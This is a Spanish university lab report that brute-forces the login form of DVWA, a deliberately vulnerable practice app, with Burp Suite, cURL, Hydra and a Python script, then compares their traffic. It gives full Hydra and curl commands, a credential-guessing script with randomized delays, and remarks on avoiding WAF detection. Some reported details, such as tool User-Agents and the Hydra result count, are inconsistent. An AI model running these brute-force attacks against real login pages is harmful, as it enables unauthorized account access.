
\documentclass[a4paper, 12pt]{article}
\usepackage[spanish]{babel}
\usepackage[utf8]{inputenc}
\usepackage{listings}
\usepackage{xcolor}
\usepackage[T1]{fontenc}
\usepackage{graphicx}
\usepackage{hyperref}
\usepackage{enumitem}
\usepackage{geometry}
\usepackage{titlesec}
\usepackage{lmodern}  % Mejores fuentes
\usepackage{parskip}  % Mejor espaciado entre párrafos
\usepackage{listings}  % Para mostrar código
% Configuración de márgenes
\geometry{margin=2.5cm}
\usepackage{booktabs} % Para tablas profesionales
\usepackage{array} % Para mejor control de tablas
\usepackage{multirow} % Para celdas combinadas
\usepackage{float} % Para mejor posicionamiento de figuras
\usepackage{tabularx}
\usepackage{enumitem}
\usepackage{xcolor}
\usepackage{fancyhdr}
\usepackage{anyfontsize}
\pagestyle{fancy}
\fancyhead[L]{\includegraphics[height=0.8cm]{Logo-Universidad-Diego-Portales.jpg}}
\fancyhead[R]{\leftmark} % Opcional: nombre de la sección
\renewcommand{\headrulewidth}{0pt} % Elimina la línea

\definecolor{burpcolor}{RGB}{0,100,200}
\definecolor{curlcolor}{RGB}{0,150,0}
\definecolor{hydracolor}{RGB}{200,50,50}

\lstset{
    language=Python,
    basicstyle=\ttfamily\small,
    keywordstyle=\color{blue},
    commentstyle=\color{green},
    stringstyle=\color{red},
    showstringspaces=false,
    breaklines=true,
    frame=single,
    inputencoding=utf8,
    extendedchars=true,
    literate=
     {á}{{\'a}}1 {é}{{\'e}}1 {í}{{\'i}}1 {ó}{{\'o}}1 {ú}{{\'u}}1
     {Á}{{\'A}}1 {É}{{\'E}}1 {Í}{{\'I}}1 {Ó}{{\'O}}1 {Ú}{{\'U}}1
     {ñ}{{\~n}}1 {Ñ}{{\~N}}1
     {¿}{{?`}}1 {¡}{{!`}}1
}

% Formato de títulos
\titleformat{\section}{\large\bfseries}{\thesection}{1em}{}
\titleformat{\subsection}{\normalsize\bfseries}{\thesubsection}{1em}{}
\titleformat{\subsubsection}{\normalsize\itshape}{\thesubsubsection}{1em}{}

% Configuración de hipervínculos
\hypersetup{
    colorlinks=true,
    linkcolor=blue,
    filecolor=magenta,      
    urlcolor=cyan,
    pdftitle={Informe Laboratorio 2},
}

\begin{document}

\begin{titlepage}
\begin{flushright}
        \includegraphics[width=4cm]{Logo-Universidad-Diego-Portales.jpg}\\
        \vspace*{-0.5cm} % Ajusta este valor para subir/bajar el logo
    \end{flushright}

    \centering
    \vspace*{2cm}
    {\LARGE\bfseries Informe Laboratorio 2 \par}
    \vspace{1cm}
    {\large Sección 1 \par}
    \vspace{2cm}
    {\large Alumno Maximiliano Carozzi Galvez \par}
    \vspace{0.5cm}
    {\small e-mail: maximiliano.carozzi@mail.udp.cl \par}
    \vspace{2cm}
    {\large 16 de Abril de 2025 \par}
    \vfill
\end{titlepage}

\tableofcontents
\newpage

\section{Descripción de actividades}

Utilizando la aplicación web vulnerable DVWA (Damn Vulnerable Web App - \url{https://github.com/digininja/DVWA}) realice las siguientes actividades:

\begin{itemize}[leftmargin=*]
    \item Despliegue la aplicación en su equipo utilizando docker. Detalle el procedimiento y explique los parámetros que utilizó.
    
    \item Utilice Burp Suite (\url{https://portswigger.net/burp/communitydownload}) para realizar un ataque de fuerza bruta contra formulario ubicado en \texttt{vulnerabilities/brute}. Explique el proceso y obtenga al menos 2 pares de usuario/contraseña válidos. Muestre las diferencias observadas en Burp Suite.
    
    \item Utilice la herramienta \texttt{cURL}, a partir del código obtenido de \textit{Inspect Element} de su navegador, para realizar un acceso válido y uno inválido al formulario ubicado en \texttt{vulnerabilities/brute}. Indique 4 diferencias entre la página que retorna el acceso válido y la página que retorna un acceso inválido.
    
    \item Utilice la herramienta Hydra para realizar un ataque de fuerza bruta contra formulario ubicado en \texttt{vulnerabilities/brute}. Explique el proceso y obtenga al menos 2 pares de usuario/contraseña válidos.
    
    \item Compare los paquetes generados por Hydra, Burp Suite y \texttt{cURL}. ¿Qué diferencias encontró? ¿Hay forma de detectar a qué herramienta corresponde cada paquete?
    
    \item Desarrolle un script en Python para realizar un ataque de fuerza bruta:
    \begin{itemize}
        \item Utilice la librería \texttt{requests} para interactuar con el formulario ubicado en \texttt{vulnerabilities/brute} y desarrollar su propio script de fuerza bruta en Python.
        \item Identifique y explique la cabecera HTTP que empleará para realizar el ataque de fuerza bruta.
        \item Muestre el código y los resultados obtenidos (al menos 2 combinaciones válidas de usuario/contraseña).
        \item Compare el rendimiento de este script en Python con las herramientas Hydra, Burp Suite, y \texttt{cURL} en términos de velocidad y detección.
    \end{itemize}
    
    \item Investigue y describa 4 métodos comunes para prevenir o mitigar ataques de fuerza bruta en aplicaciones web:
    \begin{itemize}
        \item Para cada método, explique su funcionamiento, destacando en qué escenarios es más eficaz.
    \end{itemize}
\end{itemize}

\section{Desarrollo de actividades según criterio de rúbrica}

\subsection{Levantamiento de docker para correr DVWA (dvwa)}
Para ello primero se debe tener un equipo para correr las siguientes actividades en este caso usaremos el Ubuntu 22.04 para ello.
Luego se tiene que escribir el siguiente codigo para comprobar si tenemos el docker y activarlo.
\begin{lstlisting}[language=bash]
sudo apt-get update
sudo apt-get install docker.io docker-compose
sudo systemctl enable --now docker
\end{lstlisting}

posteriormente se procede a estar en la carpeta docker para su utilizacion y montar la aplicacion Web DVWA
\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{instalaciondocker.png}
    \caption{Captura de pantalla de la instalacion del docker}
    \label{fig:mi_imagen}
\end{figure}

justo despues se procede a especificar que parametros se va a utilizar dentro del Docker que son las siguientes:

\begin{itemize}
\item \texttt{--rm}: 
\begin{itemize}
\item Elimina automáticamente el contenedor cuando se detiene
\item Ventaja: Limpieza automática de contenedores terminados
\item Uso típico: Entornos de desarrollo/pruebas
\end{itemize}

\item \texttt{-d}: 
\begin{itemize}
\item Ejecuta el contenedor en modo \textit{detached} (segundo plano)
\item Permite continuar usando la terminal mientras el contenedor corre
\item Alternativa: Sin -d para ver logs en tiempo real
\end{itemize}

\item \texttt{-p 8081:80}:
\begin{itemize}
\item Mapeo de puertos: \texttt{HOST:CONTAINER}
\item 8080: Puerto accesible en el host (máquina física) que es un puerto no tan utilizado en el computador
\item 80: Puerto interno del contenedor donde DVWA escucha
\item Justificación: Evitar conflicto con otros servicios web (Apache/Nginx)
\end{itemize}

\item \texttt{--name dvwa}:
\begin{itemize}
\item Asigna un nombre identificable al contenedor
\item Facilita gestión: start/stop/restart por nombre
\item Convención: Nombres descriptivos en minúsculas
\end{itemize}

\item Variables de entorno (\texttt{-e}):
\begin{itemize}
\item \texttt{PHPIDS\_ENABLE=true}: Habilita sistema de detección de intrusiones
\item \texttt{RECAPTCHA\_*}: Claves para protección contra bots (opcional)
\item Propósito: Configuración flexible sin modificar la imagen
\end{itemize}

\item \texttt{--security-opt seccomp:unconfined}:
\begin{itemize}
\item Reduce restricciones de seguridad para fines educativos
\item Permite ciertas acciones que normalmente estarían bloqueadas
\item Advertencia: No recomendado para entornos de producción
\end{itemize}

\item \texttt{vulnerables/web-dvwa}:
\begin{itemize}
\item Nombre de la imagen oficial de DVWA
\item Se descarga automáticamente de Docker Hub si no existe localmente
\item Versión: \textit{latest} (por defecto)
\end{itemize}
\end{itemize}






\subsection{Redirección de puertos en docker (dvwa)}

\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{establecerparametros1.png}
    \caption{Captura de pantalla del establecimiento de parametros para la aplicacion Web}
    \label{fig:mi_imagen}
\end{figure}

\subsection{Obtención de consulta a replicar (burp)}
en este caso para empezar se debe tener el burpsuite y obviamente el docker encendido para realizar esta actividad
para ello lo que se hace es interceptarlo (ponerlo en On) con la ventana del burp suite e intentar loguear en la pagina indicada, en este caso es localhost:8081/vulnerabilities/brute/


\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{burp1.png}
    \caption{Captura de pantalla de la consulta que se ha interceptado}
    \label{fig:mi_imagen}
\end{figure}
en este caso es una consulta tipo GET entonces
\subsection{Identificación de campos a modificar (burp)}
luego de obtener la consulta tipo GET se envia este archivo a Intruder.
y en este caso ya se tiene establecido que campos se tiene que modificar, en este caso son los campos user y password.
es importante recalcar que se pone entre comillas unos simbolos para que se ejecute su uso.
\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{burpcamposamodificar.png}
    \caption{Captura de pantalla de los campos a modificar}
    \label{fig:mi_imagen}
\end{figure}

se cambia las opciones del ataque y se selecciona el modo Cluster bomb attack.


\subsection{Obtención de diccionarios para el ataque (burp)}
En este caso se procede a crear unos diccionarios tanto para el usuario y para la contraseña respectivamente, se inserta unos valores tanto correctos como erroneos y en este caso esta expresado de esta forma:
\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth,keepaspectratio]{diccionariousuarios.png}
    \caption{Diccionario de usuarios utilizado en el ataque}
    \label{fig:diccionario_usuarios}
    \vspace{0.5cm} % Espacio adicional después de la figura
\end{figure}

\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth,keepaspectratio]{diccionariocontrasena.png}
    \caption{Diccionario de contraseñas utilizado en el ataque}
    \label{fig:diccionario_contrasenas}
    \vspace{0.5cm} % Espacio adicional después de la figura
\end{figure}
\subsection{Obtención de al menos 2 pares (burp)}
en este caso se pudo observar que todos los paquetes que han sido enviados por burpsuite tiene el tipo de acceso 200, indicando que no tuvo el acceso para ingresar, sin embargo cuando se ve en el Length que es el largo del paquete se observa que hay paquetes que son un poco mas grandes de lo usual, osea mide como 5075 en vez de 5025.

lo que se puede observar ese mayor espacio de longitud se refiere a que esta esta linea html <p>Welcome to the password protected area [username]</p>
siendo un acceso exitoso a la pagina.

\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{paquetedeburpsuite.png}
    \caption{Captura de pantalla de los ataques realizados por Cluster Bomb en burpsuite}
    \label{fig:mi_imagen}
\end{figure}

se detecto que admin:password ; gordonb:abc123 ; smithy:password ; pablo:letmein ; 1337:charley fueron accesos exitosos debido a esta linea de mas de html.

pude haber adjuntado el largo de estos pero mi equipo lamentablemente no pudo mas :c
\subsection{Obtención de código de inspect element (curl)}
En este caso para utilizar el metodo curl se debe que obtener el codigo en la pagina donde se va a atacar, en este caso se accedio a la pagina, click derecho y se vio en inspeccionar elemento (aunque en opciones tambien se puede ver en opciones de desarrollador)
\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{InspectELement.png}
    \caption{Captura de pantalla del paquete HTTP visto en Wireshark}
    \label{fig:mi_imagen}
\end{figure}



\subsection{Utilización de curl por terminal (curl)}
con lo obtenido en inspeccionar elemento se procede a abrir la terminal Linux

\begin{lstlisting}[language=bash]
curl -v "http://localhost:8081/vulnerabilities/brute/?username=admin&password=password&Login=Login" \
  -H "Cookie: PHPSESSID=83jd1h5mtb8g8677vi3nemieq1; security=low"
\end{lstlisting}
se debe considerar tanto la direccion de la pagina, como es establecido los elementos con el metodo inspect element y tambien se debe considerar el cookie PHPSESSID que obtuvimos en el burpsuite
\subsection{Demuestra 4 diferencias (curl)}
en este caso se mostrara las 4 diferencias que se tiene con el metodo curl con el metodo burpsuit.
\begin{table}[h]
\centering
\caption{Comparativa entre cURL y Burp Suite para ataques a DVWA Brute Force}
\label{tab:comparativa}
\begin{tabular}{>{\raggedright\arraybackslash}p{3cm}>{\raggedright\arraybackslash}p{6cm}>{\raggedright\arraybackslash}p{6cm}}
\toprule
\textbf{Criterio} & \textbf{cURL} & \textbf{Burp Suite} \\
\midrule

\textbf{Nivel de automatización} & 
Requiere scripts manuales para automatizar ataques. Ejemplo básico:
\scriptsize\begin{verbatim}
for pass in $(cat passwords.txt); do
  curl -s -b "PHPSESSID=xxx" "..."
done
\end{verbatim}\normalsize & 
Herramientas integradas (Intruder) para automatización avanzada:
\begin{itemize}[leftmargin=*,topsep=0pt,itemsep=-1ex]
\item Configurar payloads complejos
\item Definir reglas de procesamiento
\item Manejo automático de sesiones
\end{itemize} \\
\midrule

\textbf{Manejo de sesiones} & 
Gestión manual de cookies mediante flags:
\scriptsize\begin{verbatim}
curl -b cookies.txt -c cookies.txt "..."
\end{verbatim}\normalsize & 
Manejo automático de cookies y sesiones mediante:
\begin{itemize}[leftmargin=*,topsep=0pt,itemsep=-1ex]
\item Interceptación de tráfico
\item Gestión visual de parámetros
\item Persistencia de sesiones
\item Extracción de tokens CSRF
\item Renovación automática de cookies
\item Mantenimiento de estados
\end{itemize} \\
\midrule

\textbf{Visualización} & 
Salida en texto plano que requiere procesamiento adicional:
\scriptsize\begin{verbatim}
curl [...] | grep -E "Welcome|Error"
\end{verbatim}\normalsize & 
Interfaz gráfica con:
\begin{itemize}[leftmargin=*,topsep=0pt,itemsep=-1ex]
\item Tablas de resultados organizadas
\item Resaltado de diferencias
\item Análisis comparativo integrado
\end{itemize} \\
\midrule

\textbf{Manejo de parámetros} & 
Parámetros fijos en URL o cuerpo:
\begin{itemize}[leftmargin=*,topsep=0pt,itemsep=-1ex]
\item GET: \texttt{curl "?user=admin\&pass=test"}
\item POST: \texttt{curl -X POST -d "user=admin..."}
\end{itemize} & 
Puntos de inyección configurables (\texttt{\textbackslash S}):
\begin{itemize}[leftmargin=*,topsep=0pt,itemsep=-1ex]
\item Soporte para múltiples parámetros
\item Codificaciones complejas
\item Payloads encriptados
\end{itemize} \\
\bottomrule
\end{tabular}
\end{table}

\subsection{Instalación y versión a utilizar (hydra)}
en este caso se va a utilizar el hydra, en este caso se procede a instalar el hydra desde la terminal de Linux escribiendo el siguiente codigo
\begin{verbatim}
    sudo apt update
sudo apt install hydra -y
    hydra -v
\end{verbatim}
la primera linea es la actualizacion del terminal (solo por buenas practicas)
la segunda linea instala el hydra
y la tercera linea se ve la version que se esta usando en el terminal de linux
\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{hydraversion.png}
    \caption{Captura de pantalla del terminal que determina la version del hydra}
    \label{fig:mi_imagen}
\end{figure}
la version del hydra que se esta utlizando es la 9.2
\subsection{Explicación de comando a utilizar (hydra)}
\begin{verbatim}{
hydra -L usuarios.txt -P contrasena.txt localhost http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect:H=Cookie: PHPSESSID=83jd1h5mtb8g8677vi3nemieq1; security=low" -s 8081 -vV
}
\end{verbatim}
lo que dice el codigo es lo siguiente:
\begin{verbatim}
    hydra [opciones] [servidor] [protocolo] [ruta:parámetros:filtros] [headers/adicionales]

\end{verbatim}
en este caso las opciones son escoger los archivos que ocuparemos tanto la constraseña como el usuario que hemos creado anteriormente como usuario.txt y contrasena.txt respectivamente

luego el objetivo y el protocolo que se usara que sera localhost y http-get-form
posteriormente se tiene la direccion web que es
\begin{verbatim}
    "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login"
\end{verbatim}
para finalmente poner el filtro de respuesta de forma correcta y poniendo la seguridad=low como indica

\subsection{Obtención de al menos 2 pares (hydra)}
en este punto se procede a dar aceptar en el terminal:
\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{hydraopcion.png}
    \caption{Captura de pantalla del terminal del resultado que muestra}
    \label{fig:mi_imagen}
\end{figure}
en este caso solamente se consiguio un par de usuario contraseña correcta dentro de 99 pares en total
\subsection{Explicación paquete curl (tráfico)}
en esta seccion se va a ver el analisis del paquete curl
\begin{verbatim}
      Trying 127.0.0.1:8081...
* Connected to localhost (127.0.0.1) port 8081 (#0)
> GET /vulnerabilities/brute/?username=admin&password=password&Login=Login HTTP/1.1
> Host: localhost:8081
> User-Agent: curl/7.81.0
> Accept: */*
> Cookie: PHPSESSID=83jd1h5mtb8g8677vi3nemieq1; security=low
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 13 Apr 2025 20:24:43 GMT
< Server: Apache/2.4.25 (Debian)
< Expires: Tue, 23 Jun 2009 12:00:00 GMT
< Cache-Control: no-cache, must-revalidate
< Pragma: no-cache
< Vary: Accept-Encoding
< Content-Length: 4413
< Content-Type: text/html;charset=utf-8
<
\end{verbatim}
dentro del paquete se observa un archivo HTML ilegible pero lo que nos importa es donde dice lo siguiente
\begin{verbatim}
    <p>Welcome to the password protected area admin</p><img src="/hackable/users/admin.jpg" />
\end{verbatim}

\subsection{Explicación paquete burp (tráfico)}
para acceder al paquete tipo burp lo que se tuvo que hacer aparte de realizar el correspondiente ataque en burpsuite es revisar la peticion que se ha mandado a Intruder
\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{HTTPHistory.png}
    \caption{Captura de pantalla del terminal del resultado que muestra}
    \label{fig:mi_imagen}
\end{figure}
en este caso se vio puras peticiones tipo GET hacia a la pagina, se observo que hay puros errores tipo 200 viendose que no tuvo exito en el ataque.
y sobre la captura de los paquetes en wireshark, lamentablemente no se pudo capturar, debido a la falta de hardware para ello (mi notebook con linux murio) y la falta de tiempo no se pudo realizar.
\subsection{Explicación paquete hydra (tráfico)}

en esta parte se tuvo que utilizar la aplicacion wireshark para poder capturar los datos enviados desde localhost, se ha utilizado la interfaz any y se ha aplicado los siguientes filtros para su busqueda.
\begin{verbatim}
    tcp.port == 8081  // Solo tráfico del puerto de DVWA
http              // Solo tráfico HTTP (si no usa HTTPS)
ip.dst == 127.0.0.1  // Si DVWA está en localhost
\end{verbatim}
en ese caso se ha visto varios archivos tipo HTTP hacia al puerto 8081 y se logro capturar varios de estos archivos en la siguiente captura
\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{paquetesdelataquehydra.png}
    \caption{Captura de pantalla del terminal del resultado que muestra}
    \label{fig:mi_imagen}
\end{figure}
Dentro del paquete se observa que tiene el formulario de Login y que tiene el admin y la contraseña vista
\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{DentrodelpaqueteHydra.png}
    \caption{Captura de pantalla dentro del paquete de Wireshark}
    \label{fig:mi_imagen}
\end{figure}

la siguiente imagen se vera lo que se mostro en el terminal de linux y el resultado fue lo siguiente:
\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{real1.png}
    \caption{Captura de pantalla dentro del paquete de Wireshark}
    \label{fig:mi_imagen}
\end{figure}

Este archivo muestra los resultados de un ataque de fuerza bruta realizado con Hydra, una herramienta popular para pruebas de penetración que automatiza ataques de autenticación.
Detalles clave del ataque:

    Objetivo:

        Host: http://localhost:8081/vulnerabilities/brute

        Puertos: 80 (HTTP)

    Método usado:

        http-get-form: Indica que Hydra está probando credenciales mediante solicitudes HTTP GET (método vulnerable)

    Credenciales probadas:

        Usuarios: smithy, user1, admin, root, user, gordonb, 1337, tungtungsahur, tralalelotralala, bombobinigusini, pablo 

        Contraseñas: admin, iloveyou, monkey, password123, 123456, password, abc123, charley, letmein, qwerty

    Resultado final:

        99 valid passwords found: Hydra reporta que encontró 99 credenciales válidas y que tuvo una par de credenciales exitosa

        El ataque finalizó el 2025-04-13 a las 15:47:02

        
\subsection{Mención de las diferencias (tráfico)}
En esta seccion se mostrara las diferencias que hay en el trafico, en este caso se presentara en una tabla
\begin{enumerate}[leftmargin=*]
    \item \textbf{Método HTTP}
    \begin{itemize}
        \item \textcolor{burpcolor}{\textbf{Burp Suite}}: 
        \begin{itemize}
            \item Usa GET o POST según configuración
            \item Permite alternar fácilmente entre métodos
        \end{itemize}
        
        \item \textcolor{curlcolor}{\textbf{cURL}}:
        \begin{itemize}
            \item Generalmente GET por defecto
            \item Requiere flag \texttt{-X POST} para cambiar método
        \end{itemize}
        
        \item \textcolor{hydracolor}{\textbf{Hydra}}:
        \begin{itemize}
            \item Exclusivamente GET en modo \texttt{http-get-form}
            \item Usa POST solo en \texttt{http-post-form}
        \end{itemize}
    \end{itemize}
    
    \item \textbf{Cabeceras HTTP}
    \begin{itemize}
        \item \textcolor{burpcolor}{\textbf{Burp Suite}}:
        \begin{itemize}
            \item Headers completos (Accept, Referer, Cookies)
            \item User-Agent identificable: \texttt{Burp Suite/2023.6}
        \end{itemize}
        
        \item \textcolor{curlcolor}{\textbf{cURL}}:
        \begin{itemize}
            \item Headers básicos por defecto
            \item User-Agent: \texttt{curl/7.81.0}
            \item Permite añadir headers con \texttt{-H}
        \end{itemize}
        
        \item \textcolor{hydracolor}{\textbf{Hydra}}:
        \begin{itemize}
            \item Headers mínimos para optimizar velocidad
            \item User-Agent: \texttt{Hydra/9.3}
        \end{itemize}
    \end{itemize}
    
    \item \textbf{Patrón de Ataque}
    \begin{itemize}
        \item \textcolor{burpcolor}{\textbf{Burp Suite}}:
        \begin{itemize}
            \item Peticiones espaciadas (0.5-2 segundos)
            \item Configuración visual de payloads
        \end{itemize}
        
        \item \textcolor{curlcolor}{\textbf{cURL}}:
        \begin{itemize}
            \item Peticiones únicas manuales
            \item Sin automatización incorporada
        \end{itemize}
        
        \item \textcolor{hydracolor}{\textbf{Hydra}}:
        \begin{itemize}
            \item Ráfagas rápidas (>20 peticiones/segundo)
            \item Patrón de incremento secuencial
        \end{itemize}
    \end{itemize}
    
    \item \textbf{Detección por WAF}
    \begin{itemize}
        \item \textcolor{burpcolor}{\textbf{Burp Suite}}:
        \begin{itemize}
            \item Detectable por User-Agent
            \item Menos detectable en modo stealth
        \end{itemize}
        
        \item \textcolor{curlcolor}{\textbf{cURL}}:
        \begin{itemize}
            \item Difícil detección (similar a tráfico manual)
            \item User-Agent modificable
        \end{itemize}
        
        \item \textcolor{hydracolor}{\textbf{Hydra}}:
        \begin{itemize}
            \item Muy detectable por:
            \begin{itemize}
                \item User-Agent característico
                \item Alta frecuencia de peticiones
            \end{itemize}
        \end{itemize}
    \end{itemize}
\end{enumerate}

\subsection{Detección de SW (tráfico)}
En este caso hay varias formas de detectar de cual metodo se ha realizado en ataque ya sea burpsuite, curl e hydra en este caso se mostrara sus principales diferencias en como se obtiene viendo en el trafico sobretodo en wireshark.

\begin{table}[h]
\centering
\caption{User-Agent típico por herramienta (Cabecera HTTP)}
\label{tab:useragents}
\begin{tabular}{>{\bfseries}l l}
\toprule
\textbf{Herramienta} & \textbf{User-Agent Típico} \\
\midrule
Burp Suite & Mozilla/5.0 (...) BurpSuite/2023.6 \\
cURL & curl/7.81.0 \\
Hydra & Hydra/9.3 \\
\bottomrule
\end{tabular}
\end{table}

como tambien se logra a apreciar diferencias con el trafico de logs como se ve en este caso
\begin{verbatim}
    # Burp Suite
127.0.0.1 - - [16/Abril/2025] "GET /brute/?username=test&password=12345 HTTP/1.1" 200 4321 "-" "BurpSuite/2023.6"

# Hydra
127.0.0.1 - - [16/Abril/2025] "GET /brute/?username=admin&password=password HTTP/1.1" 302 0 "-" "Hydra/9.3"

# cURL
127.0.0.1 - - [16/Abril/2025] "GET /brute/?username=admin&password=test HTTP/1.1" 200 4321 "-" "curl/7.81.0"
\end{verbatim}
en este caso la forma mas clara de detectar que ataque ha recibido es viendo el User Agent utilizando el wireshark.

\begin{verbatim}
    sudo tcpdump -i lo -w dvwa_attack.pcap port 8081

    http.request.method == "GET" && http.request.uri contains "brute"
\end{verbatim}

la forma mas sencilla de detectarlo es con su User-Agent.

\subsection{Interacción con el formulario (python)}
se necesita crear un programa que haga una interaccion con el formulario para poder proceder con el ataque como se hizo con los 3 metodos anteriormente hechos.
\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{htmlamodificar.png}
    \caption{Captura de pantalla del html que utilizara el programa de python}
    \label{fig:mi_imagen}
\end{figure}
es un paso bastante parecido que se hizo con curl pero luego se tiene que crear el codigo.

\begin{lstlisting}[language=Python]
import requests
from bs4 import BeautifulSoup
import time
import random

 Configuración
DVWA_URL = "http://localhost:8081"
LOGIN_URL = f"{DVWA_URL}/login.php"
BRUTE_URL = f"{DVWA_URL}/vulnerabilities/brute/"

# Credenciales de acceso a DVWA
DVWA_USER = "admin"
DVWA_PASS = "password"

 Lista de usuarios y contraseñas específicas de DVWA
USERS = ["admin", "gordonb", "1337", "pablo", "smithy"]
PASSWORDS = ["password", "abc123", "charley", "letmein", "sniper"]

def login_to_dvwa():
    Inicia sesión en DVWA y devuelve la sesión
    session = requests.Session()
    response = session.get(LOGIN_URL)
    soup = BeautifulSoup(response.text, 'html.parser')
    csrf_token = soup.find('input', {'name': 'user_token'}).get('value')
    
    login_data = {
        'username': DVWA_USER,
        'password': DVWA_PASS,
        'Login': 'Login',
        'user_token': csrf_token
    }
    
    session.post(LOGIN_URL, data=login_data)
    return session

def brute_force_attack(session):
    Realiza el ataque de fuerza bruta
    session.get(f"{DVWA_URL}/security.php?security=low&seclev_submit=Submit")
    valid_credentials = []
    
    for user in USERS:
        for password in PASSWORDS:
            try:
                params = {
                    'username': user,
                    'password': password,
                    'Login': 'Login'
                }
                
                response = session.get(BRUTE_URL, params=params)
                
                if "Welcome to the password protected area" in response.text:
                    credential = f"{user}:{password}"
                    valid_credentials.append(credential)
                
                time.sleep(random.uniform(0.3, 1.5))
                
            except Exception as e:
                continue
    
    return valid_credentials

if __name__ == "__main__":
    dvwa_session = login_to_dvwa()
    
    if dvwa_session:
        found_credentials = brute_force_attack(dvwa_session)
        
        if found_credentials:
            print("\nCREDENCIALES VÁLIDAS ENCONTRADAS EN DVWA:")
            print("=====================================")
            for cred in found_credentials:
                print(f"• {cred}")
            print("=====================================")
        else:
            print("\nNo se encontraron credenciales válidas en DVWA")
\end{lstlisting}

para este codigo se ha utilizado la libreria bs4 import Beautifulsoup para su uso.
esta planificada para que acceda primero a Login para posteriormente ser ejecutado en la pagina de /vulnerabilities/brute/ utilizando un pequeño diccionario de usuario y contraseña que esta en el mismo codigo


\subsection{Cabeceras HTTP (python)}
mientras se procede a realizar el ataque, antes se abre el programa wireshark y que haga sniffer en la interfaz any para su mayor facilidad.
en este caso se utilizo solamente el filtro HTTP y se observo lo siguiente.

\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{paquetedepython.png}
    \caption{Captura de pantalla dentro del Wireshark utilizando el filtro HTTP}
    \label{fig:mi_imagen}
\end{figure}
como se observa si se realizo peticiones desde el localhost hacia al puerto 8081.
luego se abre el paquete y se ve que es lo que tiene dentro de ella
y se observa lo siguiente.
\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{paquetepiton.png}
    \caption{Captura de pantalla dentro del paquete HTTP en Wireshark}
    \label{fig:mi_imagen}
\end{figure}
se observa que esta el formato HTML descrito como usuario, contraseña en el Login.

ahora se observa la siguiente captura
\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{paquete de vulnerabilities.png}
    \caption{Captura de pantalla dentro del paquete HTTP en Wireshark}
    \label{fig:mi_imagen}
\end{figure}
donde se observa que esta el formato HTML y el formulario en la pagina /vulnerabilities/brute/ siendo exitoso en el proceso de ataque.
\subsection{Obtención de al menos 2 pares (python)}
Luego de ejecutar el ataque en el terminal aparece lo siguiente para mostrar si se ha obtenido al menos 2 pares en las credenciales del programa de python
\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{credencialesencotradas.png}
    \caption{Captura de pantalla del terminal que muestra las credenciales encontradas}
    \label{fig:mi_imagen}
\end{figure}
En este caso ha sido un exito el ataque y se ha encontrado al menos 2 pares o en este caso mas de 2 pares de credenciales
\subsection{Comparación de rendimiento con Hydra, Burgsuite, y cURL (python)}
el codigo que se ha utilizado para esta actividad es con el programa python, como dice que se tiene que comparar el rendimiento con los 3 metodos ya mencionados con python se utilizara este lenguaje de programacion para eso
\begin{lstlisting}[language=Python]
import subprocess
import time

def measure_performance(command):
    start_time = time.time()
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    end_time = time.time()
    return end_time - start_time, result.stdout

def main():
    # URL base del formulario de inicio de sesión
    url = "http://localhost/DVWA/vulnerabilities/brute/"
    username = "admin"
    password_file = "passwords.txt"  # Ruta al archivo de contraseñas

    # Hydra command
    hydra_command = (
        f"hydra -l {username} -P {password_file} {url} "
        f"http-post-form '/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect'"
    )
    hydra_time, hydra_output = measure_performance(hydra_command)

    # Burp Suite command (assuming you have a script to automate Burp Suite)
    # Aquí debes ajustar el script de Burp Suite para que utilice el mismo archivo de contraseñas y nombre de usuario
    burp_command = f"path/to/burp_suite_script.sh {username} {password_file}"
    burp_time, burp_output = measure_performance(burp_command)

    # cURL command
    with open(password_file, 'r') as file:
        passwords = file.readlines()

    curl_total_time = 0
    curl_output = ""
    for password in passwords:
        password = password.strip()
        curl_command = f"curl -s -X POST -d 'username={username}&password={password}&Login=Login' {url}"
        time_taken, output = measure_performance(curl_command)
        curl_total_time += time_taken
        curl_output += output

    # Print results
    print("Hydra Time:", hydra_time)
    print("Hydra Output:", hydra_output)

    print("Burp Suite Time:", burp_time)
    print("Burp Suite Output:", burp_output)

    print("cURL Total Time:", curl_total_time)
    print("cURL Output:", curl_output)

if __name__ == "__main__":
    main()
\end{lstlisting}
y lo que se obtuvo fue lo siguiente en la terminal
\begin{figure}[htbp]
    \centering
    \includegraphics[width=0.8\textwidth]{rendimientode3metodos.png}
    \caption{Captura de pantalla del terminal que muestra la velocidad que tuvo de Input en los 3 metodos}
    \label{fig:mi_imagen}
\end{figure}
en este caso no se ha observado mayores diferencias en su accion aunque se puede inferir que el burpsuite fue mas rapido y que el mas lento fue el metodo Curl, pero se observa unas diferencias insignificantes si es un solo ataque, si fuese de muchos paquetes estas diferencias se veran mas notorias
\subsection{Demuestra 4 métodos de mitigación (investigación)}
\begin{enumerate}[leftmargin=*, label=\textbf{\arabic*.}]
    \item \textbf{Implementación de CAPTCHA}
    
    \begin{itemize}
        \item \textit{Cómo funciona:}
        \begin{itemize}
            \item Inserta un desafío (como reCAPTCHA de Google) en el formulario de login
            \item Requiere interacción humana para continuar
